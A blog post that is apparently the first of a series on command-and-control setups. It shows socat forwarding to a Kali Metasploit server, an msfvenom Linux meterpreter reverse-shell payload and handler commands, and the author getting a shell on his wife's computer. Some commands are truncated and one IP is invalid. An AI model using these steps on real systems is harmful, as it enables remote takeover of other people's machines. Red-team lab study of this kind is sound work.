Hi, I know that is been a while since the last post, but life got in the way. But it is time now.
My goal in these coming post is to setup different Command and Control systems and try them out.
Information about different C2 can be found on this fantastic site https://www.thec2matrix.com/
So as always we start with a picture that we can talk about
As you can see in the above picture my plan here is to use Socat as proxy for different C2 systems. I hope can get all above working. I will do several post on this for every C2 system that I will test.
So for this first post we will start with socat server and C2-1 server.
Short story first
- Get IP for external access from your best friend (Thomas) that handles network/firewall at work 🙂
- Install Socat server
- Install C2-1 server
- Configure Metasploit
- Create payload and run it on your wife’s computer
- Take over your wife’s computer
Install Socat server
We start easy with installation of ubuntu or any other linux dist at your own choosing. I used Ubuntu 20.10. Then I installed socat with the following command
udo apt-get install socat
Then we can try out socat with this.
sudo socat TCP4-LISTEN:443,fork TCP4:invid.se:443
What we do with above command is that we use this server as a socat proxy for my company website. I know that we use https and we will get a ssl certifcate warning but this is to make a point that the socat is working. Try now to surf to socat server ip external or internal you will end up on the site or ip that you define as the last one in the command.
If you want you want to forward more than one port this is also possible with below command
sudo socat TCP4-LISTEN:443,fork TCP4:invid.se:443 | sudo socat TCP4-LISTEN:80,fork TCP4:invid.se:80
Now that we have a simple socat server up and running and we have tried the function is is time to move on to the C2 server.
Install C2-1 server
The first C2 server that we will install is Kali machine. In my case a vm. I download the latest version from https://cdimage.kali.org/kali-images/kali-weekly/ install standard installation.
When you have the machine up and running we start with setting up metasploit with below commands
udo msfdb init
msfconsole -q or without -q
We have now installed a kali machine and configured metasploit on the machine.
Now it is time to try this simple C2 server with a payload that I email my wife!
First of we start with socat. We bind port 443 on the socat server and the forward it to the C2-1 server on port 443.
cat TCP4-LISTEN:443,fork TCP4:172.21.21.38:443
Socat server is accessible from internet if I access that external IP with port 443 it will forward this to C2-1 server. Any other port will be dropped.
Now that we have connected socat with the C2-1 server it is time to create a payload. We use msfvenom for this. Because we have C2-1 server installed and this is kali we have msfvenom installed sp I used this machine to create the payload
LHOST=your external ip on the socat server (your ip not mine)
LPORT=your port that the socat will forward to your C2-1 server (443)
msfvenom -p lin
ux/x64/meterpreter/reverse_tcp LHOST=191.242.411.17 LPORT=443 -f elf > 1.elf
We have now a executable file for a linux machine that we want to take over.
It is time to set up our C2 server, in this case metasploit
If you have not loaded metsaploit do it now.
Then we run some command to load the C2 server for us. LPORT is 443 and the LHOST is the local ip on the C2-1 server
et payload linux/x64/meterpreter/reverse_tcp
set LPORT 443
set LHOST 172.21.21.38
So now we have finally set up the environment accessing this C2 with the payload that we created.
We have now the big issue left, how do I get my wife to run this file?
or just tell here to run this?
I did go for the last one in this case.
Run the command please….
After she run it I get this on the C2-1 server
We have the machine in our hands now!
We also have shell!
We have now tried the first C2 installation and that was metasploit with socat.
Now we move the the next part 2